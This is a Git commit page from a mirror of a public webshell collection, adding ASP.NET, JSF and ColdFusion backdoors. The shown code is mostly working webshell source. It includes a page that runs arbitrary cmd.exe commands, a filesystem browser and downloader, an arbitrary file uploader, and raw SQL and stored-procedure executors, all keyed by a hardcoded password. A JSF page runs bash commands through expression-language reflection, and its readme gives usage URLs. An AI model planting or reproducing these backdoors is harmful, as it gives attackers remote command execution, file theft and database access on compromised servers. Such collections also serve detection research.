Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-24 20:23:04 +00:00
Code Issues Projects Releases Packages Wiki Activity

add some webshell

Browse source
This commit is contained in:
tennc 2014-05-19 09:10:17 +08:00
parent a7d2684ed0
commit 8870eb9484
24 changed files with 12299 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
asp/ajs/readme.md Normal file
View file

@ -0,0 +1,3 @@
like this:
www.site.com/shell.asp?x=a

2
asp/ajs/shell.asp Normal file
View file

File diff suppressed because one or more lines are too long

2198
asp/ajs/shell_decoded.asp Normal file
View file

File diff suppressed because it is too large Load diff

52
aspx/asp.net-backdoors/ChangeLog.txt Normal file
View file

@ -0,0 +1,52 @@
ASP.NET Backdoors
Copyright (c) 2012 woanware
Developed by Mark Woan (markwoan[at]gmail.com)
---------------------------------------------------------------------------
Change Log
----------
v1.3.0
------
- Added an auth key parameter, so that you can password protect each of the
pages. Modify the constant located at the top of each file. The
filesystembrowser.aspx file needs you to initially specify the "authkey=XXX"
parameter value
v1.2.0
------
- Added spexec.aspx allows you to dynamically load SQL Server stored
procedures and associated parameters, then execute the SP
v1.1.0
------
- Added sql.aspx which allows you to execute SQL statements
v1.0.2
------
- MikeA has kindly modified filesystembrowser.aspx and fileupload.aspx so that
if the application renames the files on upload, the functionality still
works, since I had hardcoded the filenames
v1.0.1
------
- Added extra validation to filesystembrowser.aspx to catch errors when
assigning a default drive. Thanks foob for the feedback
v1.0.0
------
- Initial Public Release
---------------------------------------------------------------------------
woanware
http://www.woanware.co.uk/

96
aspx/asp.net-backdoors/cmdexec.aspx Normal file
View file

@ -0,0 +1,96 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
Response.Write(HEADER);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
Response.Write("</pre>");
Response.Write(FOOTER);
}
/// <summary>
///
/// </summary>
/// <param name="command"></param>
/// <returns></returns>
private string ExecuteCommand(string command)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/c " + command;
processStartInfo.RedirectStandardOutput = true;
processStartInfo.UseShellExecute = false;
Process process = Process.Start(processStartInfo);
using (StreamReader streamReader = process.StandardOutput)
{
string ret = streamReader.ReadToEnd();
return ret;
}
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>Command</title>
</head>
<body>
<form id="formCommand" runat="server">
<div>
<table>
<tr>
<td width="30">Auth Key:</td>
<td><asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox></td>
</tr>
<tr>
<td width="30">Command:</td>
<td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
</tr>
<td>&nbsp;</td>
<td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
</tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

207
aspx/asp.net-backdoors/filesystembrowser.aspx Normal file
View file

@ -0,0 +1,207 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="c#" runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "download")
{
Response.Write(HEADER);
Response.Write(this.DownloadFile());
Response.Write(FOOTER);
}
else if (Request.Params["operation"] == "list")
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string DownloadFile()
{
try
{
if (Request.Params["file"] == null)
{
return "No file supplied";
}
string file = Request.Params["file"];
if (File.Exists(file) == false)
{
return "File does not exist";
}
Response.ClearContent();
Response.ClearHeaders();
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
Response.WriteFile(file);
Response.Flush();
Response.Close();
return "File downloaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
private string OutputList()
{
try
{
StringBuilder response = new StringBuilder();
string dir = string.Empty;
if (Request.Params["directory"] == null)
{
string[] tempDrives = Environment.GetLogicalDrives();
if (tempDrives.Length > 0)
{
for (int index = 0; index < tempDrives.Length; index++)
{
try
{
dir = tempDrives[index];
break;
}
catch (IOException){}
}
}
}
else
{
dir = Request.Params["directory"];
}
if (Directory.Exists(dir) == false)
{
return "Directory does not exist";
}
// Output the auth key textbox
response.Append("<table><tr>");
response.Append(@"<td><asp:TextBox id=""txtAuthKey"" runat=""server""></asp:TextBox></td>");
response.Append("</tr><tr><td>&nbsp;<td></tr></table>");
// Output the available drives
response.Append("<table><tr>");
response.Append("<td>Drives</td>");
string[] drives = Environment.GetLogicalDrives();
foreach (string drive in drives)
{
response.Append("<td><a href=");
response.Append("?directory=");
response.Append(drive);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list>");
response.Append(drive);
response.Append("</a></td>");
}
// Output the current path
response.Append("</tr></table><table><tr><td>&nbsp;</td></tr>");
response.Append("<tr><td>..&nbsp;&nbsp;&nbsp;<a href=\"?directory=");
string parent = dir;
DirectoryInfo parentDirInfo = Directory.GetParent(dir);
if (parentDirInfo != null)
{
parent = parentDirInfo.FullName;
}
response.Append(parent);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list\">");
response.Append(parent);
response.Append("</a></td></tr></table><table>");
// Output the directories
System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
{
response.Append("<tr><td>dir&nbsp;&nbsp;<a href=\"?directory=" + dirs.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
}
// Output the files
dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
{
response.Append("<tr><td>file&nbsp;<a href=\"?file=" + fileInfo.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
response.Append(fileInfo.Length);
response.Append("</td></tr>");
}
response.Append("</table>");
return response.ToString();
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

126
aspx/asp.net-backdoors/fileupload.aspx Normal file
View file

@ -0,0 +1,126 @@
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string UploadFile()
{
try
{
if (Request.Params["authkey"] == null)
{
return string.Empty;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return string.Empty;
}
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
/// <returns></returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

367
aspx/asp.net-backdoors/spexec.aspx Normal file
View file

@ -0,0 +1,367 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnLogin_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataAdapter sqlDataAdapter = null;
sqlCommand = new SqlCommand("sp_stored_procedures", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "SPs");
cboSps.DataSource = dataSet.Tables["SPs"];
cboSps.DataTextField = "PROCEDURE_NAME";
cboSps.DataBind();
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
catch (Exception ex)
{
lblStatus.Text = ex.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnGetParameters_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
SqlCommand sqlCommand = new SqlCommand("sp_sproc_columns", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlCommand.Parameters.Add("@procedure_name", SqlDbType.NVarChar, 390).Value = cboSps.SelectedItem.Value;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "Parameters");
gridParameters.DataSource = dataSet.Tables["Parameters"];
gridParameters.DataBind();
gridResults.Visible = false;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
DataSet dataSet = new DataSet();
SqlCommand sqlCommand = new SqlCommand(cboSps.SelectedItem.Value, sqlConnection);
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
this.AddParameters(sqlCommand);
sqlDataAdapter.Fill(dataSet, "Results");
this.UpdateParameters(sqlCommand);
gridResults.DataSource = dataSet.Tables["Results"];
gridResults.DataBind();
gridResults.Visible = true;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void AddParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
switch (((TableCell)dataGridItem.Controls[1]).Text.ToLower())
{
case "bit":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Bit).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "bigint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.BigInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "char":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Char, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "datetime":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.DateTime).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "decimal":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Decimal).Value = decimal.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "float":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Float).Value = float.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "int":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Int).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NChar).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "ntext":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NText, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nvarchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NVarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "real":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Real).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "smallint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.SmallInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "tinyint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.TinyInt).Value = uint.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "varchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.VarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
default:
continue;
}
}
if (((TableCell)dataGridItem.Controls[5]).Text == "2")
{
sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Direction = ParameterDirection.InputOutput;
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void UpdateParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
((TableCell)dataGridItem.Controls[7]).Text = sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Value.ToString();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>Stored Procedure Execute</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="form1" runat="server">
<table>
<tbody>
<tr>
<td>
Key:</td>
<td>
<asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database server:</td>
<td>
<asp:TextBox id="txtDatabaseServer" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
User id:</td>
<td>
<asp:TextBox id="txtUserId" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Password:</td>
<td>
<asp:TextBox id="txtPassword" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database:</td>
<td>
<asp:TextBox id="txtDatabase" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
</td>
<td>
<asp:Button id="btnLogin" onclick="btnLogin_Click" runat="server" Text="Login"></asp:Button>
</td>
</tr>
<tr>
<td>
Stored procedures:</td>
<td>
<asp:DropDownList id="cboSps" runat="server"></asp:DropDownList>
</td>
</tr>
<tr>
<td>
</td>
<td>
<p>
<asp:Button id="btnGetParams" onclick="btnGetParameters_Click" runat="server" Text="Get Parameters"></asp:Button>
<asp:Button id="btnExecute" onclick="btnExecute_Click" runat="server" Text="Execute Query"></asp:Button>
</p>
</td>
</tr>
<tr>
<td>
Status:</td>
<td>
<asp:Label id="lblStatus" runat="server"></asp:Label></td>
</tr>
</tbody>
</table>
<p>
<asp:DataGrid id="gridParameters" runat="server" AutoGenerateColumns="False">
<Columns>
<asp:BoundColumn DataField="column_name" HeaderText="Name"></asp:BoundColumn>
<asp:BoundColumn DataField="type_name" HeaderText="Type"></asp:BoundColumn>
<asp:BoundColumn DataField="length" HeaderText="Length"></asp:BoundColumn>
<asp:BoundColumn DataField="precision" HeaderText="Precision"></asp:BoundColumn>
<asp:BoundColumn DataField="scale" HeaderText="Scale"></asp:BoundColumn>
<asp:BoundColumn DataField="column_type" HeaderText="Column Type"></asp:BoundColumn>
<asp:TemplateColumn HeaderText="Input Value">
<ItemTemplate>
<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox>
</ItemTemplate>
</asp:TemplateColumn>
<asp:BoundColumn HeaderText="Output Value"></asp:BoundColumn>
</Columns>
</asp:DataGrid>
</p>
<p>
<asp:DataGrid id="gridResults" runat="server"></asp:DataGrid>
</p>
<p>
</p>
<p>
<a href="spexec.aspx">Restart</a>
</p>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

104
aspx/asp.net-backdoors/sql.aspx Normal file
View file

@ -0,0 +1,104 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = txtConnection.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataReader sqlDataReader = null;
sqlCommand = new SqlCommand(txtSql.Text, sqlConnection);
sqlCommand.CommandType = CommandType.Text;
sqlDataReader = sqlCommand.ExecuteReader();
StringBuilder output = new StringBuilder();
output.Append("<table width=\"100%\" border=\"1\">");
while (sqlDataReader.Read())
{
output.Append("<tr>");
int colCount = sqlDataReader.FieldCount;
for (int index = 0; index < colCount; index++)
{
output.Append("<td>");
output.Append(sqlDataReader[index].ToString());
output.Append("</td>");
}
output.Append("</tr>");
output.Append(Environment.NewLine);
}
output.Append("</table>");
Literal1.Text = output.ToString();
}
catch (SqlException sqlEx)
{
Response.Write(sqlEx.ToString());
}
catch (Exception ex)
{
Response.Write(ex.ToString());
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>SQL</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="formSql" runat="server">
<div>
<table width="100%">
<tr><td width="30">Auth Key:</td><td><asp:TextBox ID="txtAuthKey" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>Connection:</td><td><asp:TextBox ID="txtConnection" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>SQL:</td><td><asp:TextBox ID="txtSql" runat="server" Height="258px" Width="100%"></asp:TextBox></td></tr>
<tr><td>&nbsp;</td><td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td></tr>
<tr><td colspan="2"><asp:Literal ID="Literal1" runat="server"></asp:Literal></td></tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

1689
aspx/wso.aspx Normal file
View file

File diff suppressed because it is too large Load diff

103
jsp/java/java_faces_shell.xhtml Normal file
View file

@ -0,0 +1,103 @@
<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:c="http://xmlns.jcp.org/jsp/jstl/core">
<style type="text/css">
.wrapper{
border: 2px solid black;
background-color: #C0C0C0 ;
overflow:hidden;
margin: auto;
width: 50%;
word-wrap: break-word;
}
.field{
margin: 20px;
}
.output{
}
body{
background-color: #383838;
}
</style>
<body>
<c:choose>
<c:when test="${request.getParameter('do') != null}">
#{view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1,2".split(",").getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),("/bin/bash,-c,".concat(request.getParameter("do")).concat(">/tmp/shell")).split(","))}
</c:when>
<c:when test="${request.getParameter('cmd') !=null}">
<code>
<i>${request.getParameter("cmd")}</i>:
<pre>#{ view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("next").invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("useDelimiter", "a".getClass()).invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getConstructor(view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell").getClass()).newInstance(
view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell")
),"\\Z"
)
)}</pre>
</code>
</c:when>
<c:when test="${request.getParameter('clear')!= null}">
${view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1".getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"rm /tmp/shell")}
</c:when>
</c:choose>
<div class="wrapper">
<div class="field">
<center>----------------------------------------------------------</center>
<div class="output" id="output">
</div>
<center>----------------------------------------------------------</center>
<center>
<form onsubmit="return startMagic()">
<input autocomplete="off" id='cmd' name='cmd' size='100' placeholder='command' style="text-align:center; "/>
</form>
</center>
<center><font size="1"><i>Java Server Faces MiniWebCmdShell 0.2 by HeartLESS.</i></font></center>
</div>
</div>
</body>
<script type="text/javascript">
var xmlhttp;
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
} else {// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
function startMagic(){
try{
//execution
xmlhttp.open("GET",location.pathname+"?do=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
console.log(xmlhttp.responseText);
//reading
xmlhttp.open("GET",location.pathname+"?cmd=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
a = xmlhttp.responseText.indexOf('<code>');
b = xmlhttp.responseText.indexOf('</code>');
document.getElementById('output').innerHTML = xmlhttp.responseText.substr(a+6,b-a -6);
//cleaning
xmlhttp.open("GET",location.pathname+"?clear",true);
xmlhttp.send();
}catch(e){
console.log(e);
}
return false;
}
</script>
</html>

2
jsp/java/readme.md Normal file
View file

@ -0,0 +1,2 @@
like:
http://site/?do=cmd,/C,payload

688
other/ololo.cfm Normal file
View file

@ -0,0 +1,688 @@
<html>
<style type="text/css">
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{text-decoration: none;}
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<head>
<TITLE>CFM SHELL V3.0 edition</TITLE>
<meta http-equiv="Content-Type" content="text/html">
</head>
<body>
<center>
Cfm Shell v3.0 edition
</center>
<hr>
<script langauge="JavaScript" type="text/javascript">
function doMenu(item)
{
obj=document.getElementById(item);
col=document.getElementById("x" + item);
if (obj.style.display=="none")
{
obj.style.display="block"; col.innerHTML="[-]";
}
else
{
obj.style.display="none"; col.innerHTML="[+]";
}
}
</script>
<!--- Login --->
<cfif IsDefined("logout")>
<cfset structclear(cookie)>
<cflocation url="?" addtoken="No">
</cfif>
<cfif IsDefined("cookie.username")>
<!--- Main --->
<center>Username:<font color="#FFFF33"><b><cfoutput>#username#</cfoutput></b></font> !</center>
<center><b><a href="?logout">Logout</a></b></center>
<hr>
<cfoutput>
<cfset dir = #GetDirectoryFromPath(GetTemplatePath())#>
<cfif Right(dir, 1) neq "\" >
<cfset dir = "#dir#\">
</cfif>
<!--- Ham get Datasource Infor
<cfscript>
factory = CreateObject("java", "coldfusion.server.ServiceFactory");
DataSoureceInfo = factory.DataSourceService.getDatasources();
</cfscript> --->
<!--- Ham doc tep --->
<cffunction name="ReadFile" access="remote" output="true" returntype="any">
<cfargument name="fileread" type="string" required="true"/>
<cffile action="read" file="#arguments.fileread#" variable="line">
<cfoutput>#line#</cfoutput>
</cffunction>
<!--- ham xoa thu muc --->
